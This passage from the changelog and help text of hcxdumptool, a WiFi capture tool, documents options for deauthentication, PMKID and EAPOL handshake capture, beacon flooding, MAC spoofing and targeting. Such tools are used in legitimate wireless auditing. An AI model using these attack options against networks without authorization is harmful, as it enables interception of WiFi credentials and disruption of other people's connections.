-i nmea -f hcxdumptool.nmea -o gpx -F file.gpx to display the track, open file.gpx with viking --gpio_button= : Raspberry Pi GPIO pin number of button (2...27) default = GPIO not in use --gpio_statusled= : Raspberry Pi GPIO number of status LED (2...27) default = GPIO not in use --tot= : enable timeout timer in minutes (minimum = 2 minutes) : hcxdumptool will terminate if tot reached (EXIT code = 2) --reboot : once hcxdumptool terminated, reboot system --poweroff : once hcxdumptool terminated, power off system --enable_status= : enable real-time display (waterfall) only incomming traffic only once at the first occurrence due to MAC randomization of CLIENTs bitmask: 0: no status (default) 1: EAP and EAPOL 2: ASSOCIATION and REASSOCIATION 4: AUTHENTICATION 8: BEACON and PROBERESPONSE 16: ROGUE AP 32: GPS (once a minute) 64: internal status (once a minute) 128: run as server 256: run as client characters < 0x20 && > 0x7e are replaced by . example: show everything but don't run as server or client (1+2+4+8+16 = 31) show only EAP and EAPOL and ASSOCIATION and REASSOCIATION (1+2 = 3) --server_port= : define port for server status output (1...65535) : default IP: 224.0.0.255 : default port: 60123 --client_port= : define port for client status read (1...65535) : default IP: 224.0.0.255 : default port: 60123 --check_driver : run several tests to determine that driver support all(!) required ioctl() system calls --help : show this help --version : show version Run hcxdumptool -i interface --do_rcascan for at least 30 seconds, before you start an attack! Do not edit, merge or convert this pcapng files, because it will remove optional comment fields! It is much better to run gzip to compress the files. Wireshark, tshark and hcxpcapngtool will understand this. If hcxdumptool captured your password from WiFi traffic, you should check all your devices immediately! If you use GPS, make sure GPS device is inserted and has a GPS FIX, before you start hcxdumptool! 06.03.2020 ========== complete rewrite from scratch the Raspberry Pi is a little bit too slow, so we have to reduce status output. Most CLIENTs running randomized MACs. They are no longer displayed. improved IE tag walk similar to hcxpcapngtool improved attack vector added new options to improve attack vector against hardened targets added more information to help menu added option to import Berkeley packet Filter code fom tcpdump as alternative to apfilterlist and clientfilterlist make less noise on the the channel (receive more, transmit less) WLAN REASON CODE (deauthentication) no longer hardcoded moved to git versioning on non releases 29.01.2020 ========== moved to v6.0.1 removed options to set userdefined MAC_AP and/or MAC_CLIENT, because they make hcxdumptool's stealth capability ineffective improved handling of association/reassociation frames improved handling of null/powersave frames added counter for PMKID/EAPOL frames handle EAP request/response frames improved IE tag walk similar to hcxpcapngtool fixed cipher suite and AKM suite handling handle wrong FCS reduce pcapng size fixed internal counters allow mixed attack vector PSK/PSK256 handle PMKID in reassociationrequest 11.12.2019 ========== moved to v6.0.0 hcxdumptool: complete rewrite from scratch filterlist splitted (APs, CLIENTs), entries increased upt to 256 each list: --filterlist_ap --filterlist_client improved real time display: driver information and firmware information (if available) detailed information about PMKID and MESSAGE PAIR) allow more than one option (--enable_status) 0: no status (default) 1: EAPOL 2: PROBE REQUEST/PROBE RESPONSE 4: AUTHENTICATON 8: ASSOCIATION/REASSOCIATION 16: BEACON 32: GPS (once a minute) 64: internal status 128: send status to client choose pcapng frames to save (-f) using option -o improved rca_scan: 0: no real time display 1: show only access points in range (default) 2: show only access points not range 3: show all access points improved GPS handling: read GPS information directly from device --use_gps_device= or us GPSD --use_gpsd use full standard NMEA raw sentence $GPGGA, $GPRMC, $GPGWL this version need hcxpcaptool v6.0.0 to convert GPS information or gpsbabel gpsbabel -i nmea -f nmea.txt -o gpx -F test.gpx then open test.gpx with viking (layer -> waypoint -> BSSID) ignore M4 if SNONCE is zeroed ignore PMKID if zeroed improved handling of radiatapheader on ath9k_htc driver new option codes: ENTERPRISE NUMBER 0x2a, 0xce, 0x46, 0xa1 MAGIC NUMBER 0x2a, 0xce, 0x46, 0xa1, 0x79, 0xa0, 0x72, 0x33, 0x83, 0x37, 0x27, 0xab, 0x59, 0x33, 0xb3, 0x62, 0x45, 0x37, 0x11, 0x47, 0xa7, 0xcf, 0x32, 0x7f, 0x8d, 0x69, 0x80, 0xc0, 0x89, 0x5e, 0x5e, 0x98 OPTIONCODE_MACMYORIG 0xf29a (6 byte) OPTIONCODE_MACMYAP 0xf29b (6 byte) OPTIONCODE_RC 0xf29c (8 byte) OPTIONCODE_ANONCE 0xf29d (32 byte) OPTIONCODE_MACMYSTA 0xf29e (6 byte) OPTIONCODE_SNONCE 0xf29f (32 byte) OPTIONCODE_WEAKCANDIDATE 0xf2a0 (32 byte) OPTIONCODE_GPS 0xf2a1 (max 128 byte) removed weak candidate check, because it leads to many, many unauthorized MP:M1M2 hcxpioff: new options --tot, --poweroff, --reboot --tot= : enable timeout timer in minutes (minimum = 2 minutes) : hcxpioff will terminate if tot reached --reboot : once hcxpioff terminated, reboot system 20.09.2019 ========== hcxdumptool: added pcapng custom block we store all custom information inside this block list of used pcapng option codes: #define OPTIONCODE_MACMYORIG 0xf29a #define OPTIONCODE_MACMYAP 0xf29b #define OPTIONCODE_RC 0xf29c #define OPTIONCODE_ANONCE 0xf29d #define OPTIONCODE_MACMYSTA 0xf29e #define OPTIONCODE_SNONCE 0xf29f #define OPTIONCODE_WEAKCANDIDATE 0xf2a0 18.09.2019 ========== hcxdumptool: added new option --weak_candidate added weak candidate detection on PMKID and WPA1 weak candidate is no longer "hard coded" ---weak_candidate= : use this password (8...63 characters) for weak candidate alert default: 00000000 affected: client-less attack list of used pcapng option codes: #define OPTIONCODE_MACMYAP 62107 #define OPTIONCODE_RC 62108 #define OPTIONCODE_ANONCE 62109 #define OPTIONCODE_MACMYSTA 62110 #define OPTIONCODE_SNONCE 62111 #define OPTIONCODE_WEAKCANDIDATE 62112 17.09.2019 ========== hcxdumptool: added weak password check high experimental, only on WPA2 QOS new dependency: lib crypto (openssl) 07.09.2019 ========== hcxdumptool: added new options --reactive_beacon : send internal/external beacon on every received proberequest affected: ap-less --flood_beacon= : transmit internal/external beacon after every received management packet affected: ap-less 05.09.2019 ========== hcxdumptool: added new options (feature request: https://github.com/ZerBea/hcxdumptool/issues/70) --disable_internal_beacons : do not transmit beacons using received ESSIDs default: transmit this kind of beacon once on channel change or every five seconds affected: ap-less and reactive_beacon, flood_beacon --use_external_beaconlist= : transmit beacons from this list maximum ESSID length 32, maximum entries 4095 default: transmit this kind of beacon once on channel change or every five seconds affected: ap-less and reactive_beacon, flood_beacon 28.08.2019 ========== moved to v5.2.2 02.09.2019 ========== hcxdumptool : added bind() ll.sll_pkttype = PACKET_OTHERHOST | PACKET_OUTGOING added setsockopt() r.mr_type = PACKET_MR_PROMISC now dmesg will show when device entered promiscuous mode during hcxdumptool initialization: [ 6313.657830] device wlp3s0f0u11u1 entered promiscuous mode and when it left promiscuous mode when hcxdumptool terminated: [ 6313.735833] device wlp3s0f0u11u1 left promiscuous mode 01.09.2019 ========== hcxdumptool : print additional information about interfering services first_steps.txt : added quickstart guide to docs 28.08.2019 ========== moved to v5.2.1 25.08.2019 ========== hcxdumptool: removed option --ignore_warning (no longer needed) hcxdumptool forces to set monitor mode running ioctl(SIOCGIWMODE) IW_MODE_MONITOR if that doesn't work on first try, try it again and/or do monitor mode manually: ip link set down iw dev set type monitor ip link set up warning: on some drivers rtlXXXX netlink will not notice that we use forced ioctl() system calls in that case iw dev wlp3s0f0u11u4 will show you that the "netlink part" is still managed Interface wlp3s0f0u11u4 ifindex 11 wdev 0x800000001 addr 70:f1:1c:27:ae:ec type managed wiphy 8 txpower 13.00 dBm 19.08.2019 ========== moved to v5.2.0 18.08.2019 ========== hcxdumptool: print ESSID on status 1 15.08.2019 ========== hcxdumptool: added server - client status output (only local networkes) --server_port= : define port for server status output (1...65535) : default IP: 224.0.0.255 --client_port= : define port for client status read (1...65535) : default IP: 224.0.0.255 example: on client machine run hcxdumptool with option --client_port=12345 $ hcxdumptool -i -o test.pcapng --enable_status=1 --client_port=12345 on caputure machine run hcxdumptool with option --server_port=12345 $ hcxdumptool -i -o test.pcapng --enable_status=1 --server_port=12345 13.08.2019 ========== hcxdumptool: added new option --check_driver --check_driver : run several tests to determine that driver support all(!) required system calls If everything is fine, result should look like this: $ sudo hcxdumptool -i wlp3s0f0u10u4 --check_driver driver tests passed - all required ioctl() system calls are supported by driver If not, hcxdumptool will show which test failed: $ sudo hcxdumptool -i wlp3s0f0u10u5 --check_driver ioctl(SIOCGIFFLAGS) failed: No such device ioctl(SIOCGIWMODE) failed: No such device ioctl(SIOCSIFFLAGS) failed: No such device ioctl(SIOCSIWMODE) - IW_MODE_MONITOR failed: No such device ioctl(SIOCGIWMODE) failed: No such device ioctl(SIOCGIWMODE) - IW_MODE_MONITOR failed ioctl(SIOCSIFFLAGS) -IFF_UP failed: No such device ioctl(SIOCGIFFLAGS) failed: No such device ioctl(SIOCGIFFLAGS) - IFF_UP | IFF_RUNNING | IFF_BROADCAST failed ioctl(SIOCGIFINDEX) failed: No such device ioctl(SIOCETHTOOL) - ETHTOOL_GPERMADDR failed: No such device ioctl(SIOCSIWFREQ) - IW_FREQ_FIXED failed: No such device it looks like this interface/driver isn't suitable for hcxdumptool possible reasons: wrong interface selected interface is blocked by another tool driver doesn't support required ioctl() system calls 12.08.2019 ========== hcxdumptool: a crappy filter list is not longer a reason to terminate initialization 11.08.2019 ========== hcxdumptool: added new options --tot and --reboot --tot= : enable timeout timer in minutes (minimum = 2 minutes) : hcxdumptool will terminate if tot reached (EXIT code = 2) --reboot : once hcxdumptool terminated, reboot system hcxdumptool return values: 0 = every thing is fine 1 = error occured 2 = tot reached 23.07.2019 ========== hcxdumptool: moved from usleep() to nanosleep() hcxpioff: moved from usleep() to nanosleep() 17.07.2019 ========== added some additional information which ioctl() command isn't supported by driver added warning on option --do_rcascan if packet injection fails (driver doesn't support full packet injection) after 20 seconds Remarks: nl80211/cfg80211/mac80211 doesn't use use ioctl() calls, they use netlink. hcxdumptool use ioctl() calls and will not work on netlink. That is the case, if ioctl(SIOCGIWMODE) or ioctl(SIOCSIWMODE) calls failed! Read more here: https://www.quora.com/What-are-the-differences-between-netlink-sockets-and-ioctl-calls 30.06.2019 ========== increased maximum filter list entries from 64 up to 255 this will have a price tag, because hcxdumptool's respond time increases. 25.06.2019 ========== detect Raspberry Pi 4 23.06.2019 ========== moved to v 5.1.7 hcxdumptool: improved help fixed pcpng option header 12.06.2019 ========== hcxdumptool: ignore more warnings if --ignore_warning is selcted do not report issues if you run this option!!! 29.05.2019 ========== hcxdumptool moved to v 5.1.5 19.05.2019 ========== hcxdumptool: activated option --ignore warning --ignore_warning : ignore warnings try this if you get some driver warnings do not report issues 16.04.2019 ========== updated wiki device and README.md. This adapters are working fine, running kernel 4.19, 4.20 and 5.0: EDIMAX EW-7711UAN ID 7392:7710 Edimax Technology Co., Ltd ALLNET ALL-WA0150N ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter TENDA W311U+ ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter LogiLink WL0151 ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter regardles of the xhci issue. 14.04.2019 ========== removed all device names from README.md, because VENDORS often change chipsets or driver errors occur: v1 of a device is working fine, while v2 doesn't work device A, running driver A is working fine, while device B running driver A doesn't work driver doesn't support monitor mode driver support monitor mode, but doesn't support packet injection Examples here: https://bugzilla.kernel.org/show_bug.cgi?id=202241 https://bugzilla.kernel.org/show_bug.cgi?id=202243 https://bugzilla.kernel.org/show_bug.cgi?id=202541 To find a working device, I recommend to read wikidevi: https://wikidevi.com/ 02.04.2019 ========== hcxdumptool now use this radiotap header: static const uint8_t hdradiotap[] = { 0x00, 0x00, // radiotap version + pad byte 0x0e, 0x00, // radiotap header length 0x06, 0x8c, 0x00, 0x00, // bitmap 0x00, // flags 0x02, // rate 0x14, // tx power 0x01, // antenna 0x08, 0x00 // tx flags #define HDRRT_SIZE sizeof(hdradiotap) }; read more about radiotap header here: https://www.kernel.org/doc/Documentation/networking/mac80211-injection.txt header is working with: ID 148f:761a Ralink Technology, Corp. MT7610U ("Archer T2U" 2.4G+5G WLAN Adapter removed "USB ID 7392:a812 Edimax Technology Co., Ltd" from "known as working device list" because this driver is not working with the radiotap header. 30.03.2019 ========== hcxdumptool: added new option --silent --silent : do not transmit! hcxdumptool is acting like a passive dumper added RTL8187. Removed the wron devices from the list (only RT3070 ia affected) * USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter (ALFA AWUS036H) * USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter 29.03.2019 ========== added cflag DEBUG if compiled with DEBUG, hcxdumptool show raw packets and raw GSP data, directly received from the device removed ALFA AWUS036NH from the "known as workinging list", because the device doesn't work any longer, running kernel 5.0. 28.03.2019 ========== removed devices from "known working" list: * USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter (ALFA AWUS036H) * USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter because they are not working running kernel 5.0 27.03.2019 ========== removed wiringPi dependency now we are running "bare metal" - complete GPIO stuff moved to hcxdumptool and hcxpioff do not use wiringPi in combination with hcxdumptool and/or hcxpioff Makefile: removed DOGPIOSUPPORT hcxdumptool: changed options wiringPi options to GPIO options --gpio_button= : Raspberry Pi GPIO pin number of button (2...27) default = GPIO not in use --gpio_statusled= : Raspberry Pi GPIO number of status LED (2...27) default = GPIO not in use hcxpioff: changed options wiringPi options to GPIO options --gpio_button= : Raspberry Pi GPIO pin number of button (2...27) default = GPIO not in use --gpio_statusled= : Raspberry Pi GPIO number of status LED (2...27) default = GPIO not in use The GPIO is disabled on default. If you like to activate GPIO support you must do the hardware modifactions as described here: doc/gpiowait.odg and set the options according to your modification. You can choose every GPIO pin, as long as you use a pull down resistor to ground. Raspberry model should be detected by automatic and according to the revision we use: GPIO mem 0x20000000 for A, B, A+, B+, and Zero, Zero W(H) GPIO mem 0x3F000000 for 2B, 3B, 3A+, 3B+ compute modules (CMx) are not supported. 20.03.2019 ========== hcxdumptool: GPIO pins are no longer hard coded! --wpi_button= : wiringPi number of of button (0...31, Raspberry Pi A and B: 0 .. 16) default = 7 --wpi_statusled= : wiringPi number of status LED (0...31, Raspberry Pi A and B: 0 .. 16) default = 0 19.03.2019 ========== hcxpioff: refactored - GPIO pins are no longer hard coded! --wpi_button= : wiringPi number of of button (0...31, Raspberry Pi A and B: 0 .. 16) default = 7 --wpi_statusled= : wiringPi number of status LED (0...31, Raspberry Pi A and B: 0 .. 16) default = 0 --help : show this help --version : show version 16.03.2019 ========== added man page hcxdumptool.1 removed device from list: USB ID 7392:a812 Edimax Technology Co., Ltd (Edimax AC600 USB / Manufacturer: Realtek) because the driver from here: https://github.com/aircrack-ng/rtl8812au is no longer working on kernel 5.0 09.03.2019 ========== hcxdumptool moved to v 5.1.4 hcxdumptool: added new option: --ignore_warning : hcxdumptool will not terminate if other services take access on the device : warning: expect problems if hcxdumptool tries to change channels From now on, hcxdumptool will not terminate during the initalization if another service take access on the interface. Expect problems and do not report issues related to this option!!!! From now on, hcxdumptool will also show channel and frequency (when running option -C) 1 / 2412MHz (20 dBm) 2 / 2417MHz (20 dBm) 3 / 2422MHz (20 dBm) 4 / 2427MHz (20 dBm) 5 / 2432MHz (20 dBm) 6 / 2437MHz (20 dBm) 7 / 2442MHz (20 dBm) 8 / 2447MHz (20 dBm) 9 / 2452MHz (20 dBm) 10 / 2457MHz (20 dBm) 11 / 2462MHz (20 dBm) 12 / 2467MHz (20 dBm) 13 / 2472MHz (20 dBm) 09.03.2019 ========== hcxdumptool: added improved warning message Now hcxdumptool print the error message received from the driver inside the brackets $ hcxdumptool -i wlp3s0f0u1 -c 14 initialization... warning: unable to set channel 14 (Invalid argument) - removed this channel from scan list In this case the user tried to set channel 14. The driver doesn't support this and responds with Invalid argument 07.03.2019 ========== hcxdumptool: added debug code in main packet loop [processpackets()] to print raw GPS data, received from GPSD: /* printf("\ndebug: %s\n", gpsddata); */ uncomment this before you run make to retrieve this values. 06.03.2019 ========== hcxdumptool: added GPS date and GPS time to status and pcapng comment field. $ sudo hcxdumptool -i wlp3s0f0u1 --use_gpsd -o test.pcapng initialization... connecting to GPSD... waiting up to 5 seconds to retrieve first position GPSD activated start capturing (stop with ctrl+c) GPS LATITUDE.............: 49.126403 GPS LONGITUDE............: 4.626175 GPS ALTITUDE.............: 129.500000 GPS DATE.................: 06.03.2019 GPS TIME.................: 21:52:41 INTERFACE................: wlp3s0f0u1 ERRORMAX.................: 100 errors FILTERLIST...............: 0 entries MAC CLIENT...............: f04f7c89dabb MAC ACCESS POINT.........: 980ee432604d (incremented on every new client) EAPOL TIMEOUT............: 150000 REPLAYCOUNT..............: 61455 ANONCE...................: 182972399cd2e65deb7941601cca14b644681c092dcf6f704935c7f3d2eaceea INFO: cha=11, rx=7080, rx(dropped)=1676, tx=408, powned=10, err=0, lat=49.126342, lon=4.626268, alt=129.500000, gpsdate=06.03.2019, gpstime=22:01:55^C terminated... $ tshark -r test.pcapng-0 -Y frame.comment -T fields -E header=y -e frame.number -e frame.time -e wlan.sa -e frame.comment 172 Mar 6, 2019 23:01:48.793212000 CET 1a:f8:7c:91:24:a3 lat:49.126337,lon:4.626268,alt:129.500000,date:06.03.2019,time:22:01:48 05.03.2019 ========== hcxdumptool: removed general info about tx-power - now we use iw style to show tx-power/channel hcxdumptool -i -C initialization... available channels: 1 (20 dBm) 2 (20 dBm) 3 (20 dBm) ... 132 (26 dBm) 136 (26 dBm) 140 (26 dBm) 149 (13 dBm) 153 (13 dBm) 157 (13 dBm) 161 (13 dBm) 165 (13 dBm) 26.02.2019 ========== hcxdumptool moved to version 5.1.3 due several bug fixes and improved rcascan status output 18.02.2019 ========== release hcxdumptool v 5.1.2 due to serveral bugfixes 02.02.2019 ========== release hcxdumptool v 5.1.1 20.01.2019 ========== hcxdumptool: added new MT76 device: "TP-LINK Archer Archer T2U" working with kernel: 4.19, 4.20 (some issues), 5.0 read more here: https://github.com/ZerBea/hcxdumptool/issues/42 https://bugzilla.kernel.org/show_bug.cgi?id=202241 https://bugzilla.kernel.org/show_bug.cgi?id=202243 11.01.2019 ========== hcxdudmptool: From now on, we assume that a packet is outgoing, if dBm Antenne Signal is absent. 08.01.2019 ========== hcxdudmptool and mac80211_hwsim mac80211_hwsim is a Linux kernel module that can be used to simulate arbitrary number of IEEE 802.11 radios for mac80211. It can be used to test hcxdumptool: load module: $ sudo modprobe mac80211_hwsim run hcxdumptool to retrieve informations about the interface: $ hcxdumptool -I wlan interfaces: 020000000000 wlan0 (mac80211_hwsim) 020000000100 wlan1 (mac80211_hwsim) bring monitor interface up: $ sudo sudo ip link set hwsim0 up run hcxdumptool: $ sudo hcxdumptool -i wlan0 initialization... start capturing (stop with ctrl+c) INTERFACE:...............: wlan0 ERRORMAX.................: 100 errors FILTERLIST...............: 0 entries MAC CLIENT...............: c8aacc9c01ec MAC ACCESS POINT.........: 580943000000 (incremented on every new client) EAPOL TIMEOUT............: 150000 REPLAYCOUNT..............: 62263 ANONCE...................: 513282ebb604e6e10c450d6c3eaa6428d118b54abeef4672be3ef700052305d5 INFO: cha=11, rx=0, rx(dropped)=0, tx=120, powned=0, err=0 run wireshark on wlan0 or hwsim0 to monitor hcxdumptool output. do not forget to remove mac80211_hwsim if the module is not longer needed! read more here: https://www.kernel.org/doc/readme/Documentation-networking-mac80211_hwsim-README 04.01.2019 ========== hcxdumptool - changed flash time: LED flashes every 5 seconds = everything is fine LED stays on = no signal received during the last past five seconds hcxdumptool - ignore double outgoing packets (rth->it_present == 0) 03.01.2019 ========== hcxdumptool: changed flash time (5 times longer on ERROR) hcxpioff: changed flash time 20.12.2018 ========== improved detection of broken driver from now on GPIO LED blinks twice every 5 seconds - if a possbile driver issue is detected - if no packets received during the last past 5 seconds another indicator is that the incomming packetcounter (rx=xxxx) doesn't increase or dmesg show this error: [65786.808078] ieee80211 phy2: rt2x00queue_flush_queue: Warning - Queue 14 failed to flush [65824.174119] ieee80211 phy2: rt2x00queue_flush_queue: Warning - Queue 14 failed to flush [67801.029527] ------------[ cut here ]------------ it seems to be a kernel issue that hcxdumptool isn't able to handle, automatically: https://bbs.archlinux.org/viewtopic.php?id=237028 https://bugs.openwrt.org/index.php?do=details&task_id=929&opened=169&status%5B0%5D= https://community.spiceworks.com/topic/2132263-ubuntu-16-04-wifi-disconnects-randomly https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1750226 https://www.raspberrypi.org/forums/viewtopic.php?t=206815 workaround: 1) get driver information $ hcxdumptool -I wlan interfaces: 7cdd90xxxxxx wlp3s0f0u2 (rt2800usb) 2) remove module $ modprobe -r rt2800usb 3) load module $ modprobe rt2800usb 18.12.2018 ========== added new option to set station MAC address --station_mac= : use this MAC address for station format = 112233445566 format = 112233000000 (to set only OUI) format = 445566 (to set only NIC) added new option to set access point MAC address --ap_mac= : use this MAC address for access point as start MAC format = 112233445566 format = 112233000000 (to set only OUI) format = 445566 (to set only NIC) warning: do not use a MAC of an existing access point in your range improved detection of broken driver set default ERRORMAX to 100 added option to set ERRORMAX -T : set maximum ERRROR count (hcxdumptool terminates when the value is reached) default: 100 errors Remarks: errorcount will increase by one, if send packet (tx=xxx) > 3*incomming packets (rx=xxx) 15.12.2018 ========== improved random generator (now seeded with and adapter mac address) Raspberry Pi: improved handling of GPIO switch 07.12.2018 ========== restore interface settings after -C improved help menu -more informations about monitor mode -more informations about packet injection monitor mode and packet injection must be supported by the driver, otherwise hcxdumptool will not work. 05.12.2018 ========== moved to v 5.1.0 (according to hashcat) 04.12.2018 ========== added new option: -C : show available channels and quit 27.11.2018 ========== added new option: --poweroff : once hcxdumptool finished, power off system 26.11.2018 ========== several big endian fixes switched to version 5.0.1 07.10.2018 ========== added new option filter mode 3: --filterlist= : mac filter list format: 112233445566 + comment maximum line lenght 255, maximum entries 64 --filtermode= : mode for filter list 1: use filter list as protection list (default) in transmission branch receive everything, interact with all APs and CLIENTs in range, except(!) the ones from the filter list 2: use filter list as target list in transmission branch receive everything, only interact with APs and CLIENTs in range, from the filter list 3: use filter list as target list in receiving branch only receive APs and CLIENTs in range, from the filter list 30.10.2018 ========== moved to version 5.0.0 05.10.2018 ========== added more error messages fixed small bug in error count on channel change failure 04.10.2018 ========== show GPS position (if activated) in status line (refresh every 5 seconds) fixed broken status display on rcascan increased speed of rcascan fixed error handling if selected channels not supported by driver if option -t is not set, skip empty channels after one second improved scan list fixed some static var 01.10.2018 ========== changed order of channels in default scan list: 1, 9, 6, 3, 11, 7, 1, 10, 6, 8, 11, 4, 1, 12, 6, 2, 11, 5, 13 27.09.2018 ========== added GPSD support (stored as comment in pcapng file) --use_gpsd : use GPSD to retrieve position add latitude, longitude and altitude to every pcapng frame device must be supported by GPSD: http://www.catb.org/gpsd/hardware.html (tested using: AktivePilot JENTRO BT-GPS-8) Retrieve GPS information with: $ tshark -r filename.pcapng -Y frame.comment -T fields -E header=y -e frame.number -e frame.time -e wlan.sa -e frame.comment write mac_ap to pcapng SHB write mac_sta to pcapng SHB SHB optioncodes: #define OPTIONCODE_MACMYAP 62107 #define OPTIONCODE_RC 62108 #define OPTIONCODE_ANONCE 62109 #define OPTIONCODE_MACMYSTA 62110 16.09.2018 ========== show warning if NetworkManager and/or wpa_supplicant is running 15.09.2018 ========== added Cisco Systems, Inc VENDOR information --station_vendor= : use this VENDOR information for station 0: transmit no VENDOR information (default) 1: Broadcom 2: Apple-Broadcom 3: Sonos 4: Netgear-Broadcom 5: Wilibox Deliberant Group LLC 6: Cisco Systems, Inc 11.09.2018 ========== You can “uncomment a line†in a configuration file by removing the # at the start of the line. Or, to “comment out†a line, add a # character to the start of the line. 001122334455 myap # aabbccddeeff ignore this mac 112233445566 second ap # this is may comment 05.09.2018 ========== added Netgear Broadcom VENDOR information added Wilibox Deliberant Group LLC VENDOR information 04.09.2018 ========== improved rcascan (show time and access points which hide their ESSID) prepare detection of PMF refactored access point handling handle 4096 access points simultaneously refactored client handling handle 4096 clients simultaneously speed up retrieving PMKIDs (< 1 minute) attack access points which hide their ESSID increased filter list line length increased filter list maximum entries added option to show beacons in status output: --enable_status= : enable status messages bitmask: 1: EAPOL 2: PROBEREQUEST/PROBERESPONSE 4: AUTHENTICATON 8: ASSOCIATION 16: BEACON added option to choose station VENDOR information: --station_chipset= : use this VENDOR information for station 0: transmit no VENDOR information (default) 1: Broadcom 2: Apple-Broadcom 3: Sonos 30.08.2018 ========== iw/ip functionality added! now hcxdumptool will set monitor mode and bring up interface! previous interface settings will be restored, when hcxdumptool terminated 19.08.2018 ========== parse SAE authentication 19.08.2018 ========== added radio assignment scan --do_rcascan : show radio channel assignment (scan for target access points) --save_rcascan= : output rca scan list to file when hcxdumptool terminated --save_rcascan_raw= : output file in pcapngformat unfiltered packets including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) 17.08.2018 ========== detect NETWORK EAP authentication system transmit BROADCAST beacon 16.08.2018 ========== From now on we store open system authentications to pcapng only if they have have a vendor specific field. we are no longer interested in standard open system authentications (payload len = 6) changed some default values: -D : deauthentication interval default: 10 (every 10 beacons) the target beacon interval is used as trigger -A : ap attack interval default: 10 (every 10 beacons) --give_up_deauthentications=: disable transmitting deauthentications after n tries default: 100 tries (minimum: 4) affected: connections between client an access point deauthentication attacks will not work against protected management frames --give_up_ap_attacks= : disable transmitting directed proberequests after n tries default: 100 tries (minimum: 4) affected: client-less attack deauthentication attacks will not work against protected management frames 13.08.2018 ========== increased some attack values: --give_up_deauthentications=: disable transmitting deauthentications after n tries default: 100 tries (minimum: 4) affected: connections between client an access point deauthentication attacks will not work against protected management frames --give_up_ap_attacks= : disable transmitting directed proberequests after n tries default: 100 tries (minimum: 4) 07.08.2018 ========== moved to 4.2.1 added communication between hcxdumptool and hcxpcaptool via pcapng option fields: 62108 for REPLAYCOUNT uint64_t 62109 for ANONCE uint8_t[32] enabled hardware handshake instead of software handshake changed beavior auf status: --enable_status= : enables status messages bitmask: 1: EAPOL 2: PROBEREQUEST/PROBERESPONSE 4: AUTHENTICATON 8: ASSOCIATION Now we use a bitmask to deliver status messages. 06.08.2018 ========== write ISB (Interface Statistic Block) at the end of a cpature 04.08.2018 ========== addet new option (--disable-active_scan) to hcxdumptool --disable_active_scan: do not transmit proberequests to BROADCAST using a BROADCAST ESSID 04.08.2018 ========== release hcxdumptool 4.2.0 complete refactored: -various new options -measurement of EAPOL timeout -full support for hashcat hashmodes -m 16800 and 16801 -now default format is pcapng $ ./hcxdumptool-bleeding --help hcxdumptool 4.2.0 (C) 2018 ZeroBeat usage : hcxdumptool example: hcxdumptool -o output.pcapng -i wlp39s0f3u4u5 -t 5 --enable_status options: -i : interface (monitor mode must be enabled) ip link set down iw dev set type monitor ip link set up -o : output file in pcapngformat management frames and EAP/EAPOL frames including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -O : output file in pcapngformat unencrypted IPv4 and IPv6 frames including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -W : output file in pcapngformat encrypted WEP frames including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -c : set scanlist (1,2,3,...) default scanlist: 1, 3, 5, 7, 9, 11, 13, 2, 4, 6, 8, 10, 12 maximum entries: 127 allowed channels: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 34, 36, 38, 40, 42, 44, 46, 48, 52, 56, 58, 60, 62, 64 100, 104, 108, 112, 116, 120, 124, 128, 132, 136, 140, 144, 147, 149, 151, 153, 155, 157 161, 165, 167, 169, 184, 188, 192, 196, 200, 204, 208, 212, 216 -t : stay time on channel before hopping to the next channel default: 5 seconds -E : EAPOL timeout default: 100000 = 1 second value depends on channel assignment -D : deauthentication interval default: 20 (every 20 beacons) the target beacon interval is used as trigger -A : ap attack interval default: 20 (every 20 beacons) the target beacon interval is used as trigger -I : show suitable wlan interfaces and quit -h : show this help -v : show version --filterlist= : mac filter list format: 112233445566 + comment maximum line lenght 128, maximum entries 32 --filtermode= : mode for filter list 1: use filter list as protection list (default) 2: use filter list as target list --disable_deauthentications: disable transmitting deauthentications affected: connections between client an access point deauthentication attacks will not work against protected management frames --give_up_deauthentications=: disable transmitting deauthentications after n tries default: 10 tries (minimum: 4) affected: connections between client an access point deauthentication attacks will not work against protected management frames --disable_disassociations : disable transmitting disassociations affected: retry (EAPOL 4/4 - M4) attack --disable_ap_attacks : disable attacks on single access points affected: client-less (PMKID) attack --give_up_ap_attacks= : disable transmitting directed proberequests after n tries default: 10 tries (minimum: 4) affected: client-less attack deauthentication attacks will not work against protected management frames --disable_client_attacks : disable attacks on single clients points affected: ap-less (EAPOL 2/4 - M2) attack --enable_status : enable status messages --help : show this help --version : show version 01.08.2018 ========== moved some stuff from hcxtools to hcxdumptool repository prepare complete refactoring! 04.03.2018 ========== hcxdumptool: added new option -W -W : WEP encrypted packets output file in pcapformat including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) 04.03.2018 ========== hcxdumptool again complete refactored: 02.03.2018 ========== hcxdumptool is complete refactored: - improved scan engine - improved authentication engine (incl. Radio Measurement, and NULL frame detection) - dropped timer - use threads for LED and channel switch - use only one file descriptor for raw socket operations - working on Intel Corporation Centrino Ultimate-N 6300 (rev 3e) WiFi adapter (kernel >= 4.15) - working on Alfa AWUS036NH, Alfa AWUS036NHA - working on Alfa AWUS036ACH (driver: https://github.com/kimocoder/rtl8812au) - more channels allowed (depends on installed wireless regulatory domain) - simple usage: hcxdumptool -i -o dumpfile.pcap -t 5 interface (real interface - no monX) must be in monitor - all services/programs with access to the interface must be stopped! - new format of blacklist - and more... reported to run on Gentoo https://github.com/ZerBea/hcxdumptool_bleeding_testing/issues/2#issuecomment-369256915 reported to run on OpenWRT/LEDE https://github.com/ZerBea/hcxdumptool_bleeding_testing/issues/3#issuecomment-369756725 reported to run with Intel Corporation Centrino Ultimate-N 6300 (rev 3e) 